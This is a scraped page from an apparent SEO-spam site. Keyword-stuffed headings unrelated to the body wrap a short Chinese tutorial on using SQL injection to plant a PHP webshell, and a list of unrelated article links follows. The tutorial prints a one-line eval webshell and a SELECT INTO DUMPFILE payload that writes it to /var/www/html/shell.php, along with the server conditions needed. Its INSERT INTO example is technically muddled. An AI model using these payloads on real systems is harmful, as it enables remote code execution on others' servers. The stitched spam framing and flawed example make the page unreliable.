当前位置: 首页 > wzjs >正文

网站服务器在本地是指有站点网络营销平台

网站服务器在本地是指,有站点网络营销平台,写公众号怎么挣钱,东营seo网站建设费用一、INSERT INTO基于数据写入的SQL注入 1.1、条件 1、Web应用提供上传文件功能&#xff0c;用户上传的文件路径会存储在数据库中 2、数据库内容可影响Web资源访问路径 3、用户有写的权限 1.2、示例 首先我们上传一个shell.php到web应用中&#xff0c;其内容为<?php e…

一、INSERT INTO基于数据写入的SQL注入

1.1、条件

1、Web应用提供上传文件功能,用户上传的文件路径会存储在数据库中

2、数据库内容可影响Web资源访问路径

3、用户有写的权限

1.2、示例

首先我们上传一个shell.php到web应用中,其内容为<?php @eval($_POST['cmd']); ?>

然后通过SQL注入:

-- 恶意注入
INSERT INTO uploads (file_path) VALUES ('/var/www/html/shell.php'); -- 写入Webshell路径

访问 http://target.com/shell.php 后,通过POST方式传入 cmd 参数,即可执行恶意PHP代码。

二、SELECT INTO DUMPFILE基于备份与还原的SQL注入

1.1、条件

1、开启file权限(默认不开放)

2、Web服务器用户需有写权限

3、secure_file_priv为空(默认为NULL,NULL不是空)

1.2、示例

-- 正常查询
SELECT data FROM users WHERE id=1;-- 恶意注入
SELECT '<?php @eval($_POST["cmd"]); ?>' INTO DUMPFILE '/var/www/html/shell.php';

补充:与into outfile不同,into dumpfile直接写入文件,没有任何格式化处理,而into outfile会自动添加换行符、制表符,会破坏webshell。

http://www.dtcms.com/wzjs/226605.html

相关文章:

  • 济南高端网站建设关键词挖掘查询工具
  • 菏泽哪里有做网站的谷歌优化的最佳方案
  • 海南营销网站建设百度推广点击一次多少钱
  • 三好街 做网站seo排名培训公司
  • 百度提交wordpress网络优化有前途吗
  • 舟山网站建设企业国内做seo最好公司
  • 广州门户网站开发橘子seo查询
  • 郑州做系统集成的公司网站品牌运营管理有限公司
  • django完整网站开发四年级说新闻2023
  • 赣州火车站找服务东莞seo优化方案
  • 宁波市网站建设搜索引擎优化的英语简称
  • 西安免费网站建设营销策划方案怎么写?
  • 政府网站建设甲方乙方谷歌网页
  • 零售网站制作关键词林俊杰
  • wordpress网站视频播放seo关键词布局技巧
  • 做冠县梨园网站怎么做关键词优化怎么操作
  • 可以网上做单的网站营业推广的方式有哪些
  • 关键词排行优化网站湖南seo博客seo交流
  • 各大门户网站怎么做推广seo教学
  • 做网站一般用什么服务器seo和sem的概念
  • 电子商务网站建设指导思想简述网络推广的方法
  • 企业网站建设电话企业网站推广公司
  • 重庆江北网站建设小程序开发框架
  • 万维网络(临沂网站建设)上海谷歌seo公司
  • 西安有关做网站的公司有哪些品牌网络营销推广方案策划
  • 安徽省城乡建设厅网站国际军事形势最新消息
  • 网站建设后商品进不去详情页网络优化工程师简历
  • 网络科技公司属于什么行业类别百度seo查询收录查询
  • 网站显示内容不显示不出来搜索引擎优化怎么做的
  • 新疆网站建设公司模板建站教程